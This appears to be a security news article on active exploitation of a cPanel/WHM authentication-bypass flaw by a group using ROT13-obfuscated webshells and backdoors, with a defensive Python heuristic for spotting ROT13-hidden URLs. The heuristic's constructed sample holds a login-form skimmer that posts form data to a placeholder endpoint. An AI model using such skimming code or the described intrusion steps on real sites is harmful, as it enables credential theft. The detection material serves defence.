A significant security flaw identified as CVE-2026-41940 is currently being exploited in cPanel and WHM servers globally, posing a severe threat to the organizations that run them. This vulnerability, with a critical severity score of 9.8, enables cybercriminals to bypass authentication and gain access to systems without valid credentials.
Exploitation and Impact
Unauthenticated attackers are leveraging this vulnerability to compromise security and gain administrative control. This exploit has paved the way for various malicious activities such as ransomware deployment, cryptomining, and establishing persistent backdoors in Linux servers. Since its public disclosure in April 2026, there has been a significant increase in automated attacks targeting this flaw.
DailyDarkWeb reports indicate that over 2,000 unique IP addresses globally, predominantly from the US, Germany, Brazil, and the Netherlands, are actively exploiting this vulnerability. Security experts from Ctrl-Alt-Intel have revealed instances where hackers have breached Southeast Asian governmental networks, extracting over 4.37 GB of sensitive data.
The Role of Mr_Rot13
An advanced hacking group, referred to as Mr_Rot13 by XLab, has been linked to this sophisticated campaign. Known for deploying undetectable PHP backdoors, this group uses the ROT13 algorithm to obfuscate the command-and-control details in its JavaScript payloads. Mr_Rot13’s operations are highly organized, with a history of adapting quickly to security countermeasures by updating their malware and communication methods.
The attack methodology involves exploiting the CVE-2026-41940 vulnerability to bypass authentication, granting attackers instant administrative privileges. A Go-based injector tool, named ‘Payload,’ is then used to modify server credentials and establish persistent backdoor access.
Technical Details and Defense
Once access is gained, the attackers change the server’s root password and add attacker-controlled SSH public keys. A PHP webshell, dubbed ‘Cpanel-Python,’ is deployed, injecting malicious scripts into login pages to capture credentials and other sensitive data. This data is then sent to a remote command-and-control server.
The attackers further employ ‘Filemanager,’ a versatile cross-platform remote access Trojan, to manage and execute commands on compromised servers. Stolen configuration files and database credentials are exfiltrated through encrypted channels to the group’s web domains and a Telegram bot.
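The ROT13-obfuscated command-and-control strings described above give defenders a concrete thing to look for in a tampered login page. The following Python heuristic is an added example, not code from the report or from any group or tool it names: it extracts JavaScript string literals and flags those that only look like a URL or hostname after ROT13 decoding. The injected script and the domain in the sample are constructed for illustration.

```python
import codecs
import re

# JavaScript single- or double-quoted string literals (template literals are not handled).
_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')

# URL- or hostname-like text: optional scheme, two or more dot-separated labels, optional port/path.
# A bare-hostname match is a weaker signal than a match with a scheme; review hits manually.
_URL_LIKE = re.compile(
    r'^(?:https?://|wss?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:[:/][^\s]*)?$', re.IGNORECASE
)


def rot13(text):
    """ROT13 is its own inverse, so this both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def find_rot13_urls(js_source):
    """Return (literal, decoded) pairs for string literals that become URL-like only after ROT13.

    Literals that are already URL-like are skipped: they are not hiding anything.
    """
    hits = []
    for match in _STRING_LITERAL.finditer(js_source):
        literal = match.group(1) if match.group(1) is not None else match.group(2)
        if not literal or _URL_LIKE.match(literal):
            continue
        decoded = rot13(literal)
        if _URL_LIKE.match(decoded):
            hits.append((literal, decoded))
    return hits


# Constructed sample of a login-page script with a ROT13-hidden collection endpoint.
# "uggcf://rknzcyr.pbz/pbyyrpg" is ROT13 for https://example.com/collect (placeholder domain).
SAMPLE_INJECTED_JS = """
var cfg = {src: "uggcf://rknzcyr.pbz/pbyyrpg", ok: "https://example.com/static/app.js"};
var f = document.forms[0];
f.addEventListener("submit", function () { fetch(cfg.src, {method: "POST", body: new FormData(f)}); });
"""

if __name__ == "__main__":
    for literal, decoded in find_rot13_urls(SAMPLE_INJECTED_JS):
        print("suspicious literal %r decodes to %r" % (literal, decoded))
```

Run it over the HTML and JavaScript served by a cPanel or WHM login page (or over files changed since the last known-good backup) to triage for injected collection scripts.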
Indicators of compromise include specific domains and MD5 hashes associated with the malicious activity. It’s crucial for organizations to monitor for and mitigate these threats using threat intelligence platforms.
The exploitation of CVE-2026-41940 underscores the importance of robust cybersecurity measures. Organizations must remain vigilant, apply timely patches, and utilize comprehensive threat detection systems to safeguard their infrastructure against such vulnerabilities.
